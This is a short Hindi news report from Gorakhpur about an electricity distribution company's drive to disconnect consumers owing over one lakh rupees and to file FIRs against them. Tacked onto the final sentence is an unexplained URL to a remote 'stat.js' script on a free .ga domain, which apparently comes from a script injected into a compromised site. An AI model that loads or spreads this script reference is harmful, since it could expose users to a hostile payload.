गोरखपुर, ( कुलसूम फात्मा )    जी हां, अब बिजली विभाग ही नहीं बल्कि संविदा कर्मी भी एक लाख से अधिक बकाया होने पर उपभोक्ताओं के घर की लाइन काट देंगे। और यह लाइन केवल तभी जोड़ी जाएगी जब उपरोक्त बकाया पूरा भर दिया जाएगा। लाइन काटने के पश्चात लाइन जोड़ने की मॉनिटरिंग भी करेंगे।   और यह कॉन्ट्रैक्ट वर्कर्स इंजीनियर को सूचित करेंगे जिससे की लोगों पर एफआइआर कराई जाए।

 

 

आपको बता दें की पूर्वांचल विद्युत वितरण निगम लिमिटेड वाराणसी के प्रबंध निदेशक ने सभी अधीक्षण इंजीनियर तथा अधिशासी इंजीनियर को सख्ती के साथ निर्देश दिए और उन्होंने कहा के अंतर्गत कार्य करने वाले कॉन्ट्रैक्ट वर्कर्स तथा लाइनमैन को जिन उपभोक्ताओं की बकाया राशि है सूचि दे और ऐसे एरिया में जहां एक लाख से अधिक रशि बकाया है। या उससे कम के बकायेदार हैं दोनो की सूची तैयार कर पेश की जाए।

 

 

निदेशक डॉ सरोज ने बकायेदारों के विरुद्ध अभियान चलाने के निर्देश दिए हैं। सर्वप्रथम ऐसे बकायेदारों की जांच की जाएगी। उसके पश्चात एक लाख से अधिक बकाया मिलने वाले उपभोक्ताओं पर फौरन के फौरन f.i.r. की जाएगी और कनेक्शन काट दिया जाएगा। यदि कोई भी बिल का भुगतान करना चाहता है तो इंजीनियर तथा उपखंड अधिकारी को इसकी फॉरेन सूचना दी जाएगी। साथ ही इसके बिल जमा कराने के पश्चात उनको छोड़ दिया जाएगा। कई केस ऐसे आए हैं जिनमें उपभोक्ता बिल जमा करने का सहारा भी देते हैं। लेकिन डिस्कनेक्शन टीम के वापस जाते ही बिल जमा करने में फिर से वही स्थित ला खड़ी करते हैं।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.